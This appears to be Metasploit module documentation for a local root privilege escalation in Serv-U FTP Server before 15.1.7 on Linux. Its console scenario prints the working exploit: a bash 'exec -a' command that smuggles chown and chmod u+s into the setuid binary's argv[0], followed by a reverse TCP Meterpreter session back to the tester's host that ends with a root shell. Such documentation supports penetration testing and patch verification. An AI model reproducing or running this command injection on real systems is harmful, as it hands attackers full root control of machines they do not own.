## Description

  This module attempts to gain root privileges on systems running
  Serv-U FTP Server versions prior to 15.1.7.

  The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
  in a call to `system()`, without validation, when invoked with
  the `-prepareinstallation` flag, resulting in command execution
  with root privileges.


## Vulnerable Application

  [Serv-U FTP Server](https://www.serv-u.com/ftp-server-software)
  is an FTP server for Linux and Windows; however, this module
  targets only Linux systems.

  This module has been tested successfully on:

  * Serv-U FTP Server version 15.1.6 (x64) on Debian 9.6 (x64)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **SERVU_PATH**

  Path to `Serv-U` executable (default: `/usr/local/Serv-U/Serv-U`)

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)


## Scenarios

### Debian 9.6 (x64)

  ```
  msf5 exploit(multi/handler) > back
  msf5 > use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc 
  msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] bash shell is available
  [+] /usr/local/Serv-U/Serv-U is executable
  [+] /usr/local/Serv-U/Serv-U is setuid
  [*] Writing '/tmp/.24HnCiwSby' (277 bytes) ...
  [*] Executing command: bash -c 'exec -a "\";chown root /tmp/.24HnCiwSby;chmod u+s /tmp/.24HnCiwSby;chmod +x /tmp/.24HnCiwSby\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
  [+] /tmp/.24HnCiwSby setuid root successfully
  [*] Executing payload...
  [*] Transmitting intermediate stager...(106 bytes)
  [*] Sending stage (985320 bytes) to 172.16.191.250

  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.250:58662) at 2019-06-28 23:46:48 -0400
  [-] Failed to delete /tmp/.24HnCiwSby: stdapi_fs_delete_file: Operation failed: 1

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > 
  ```

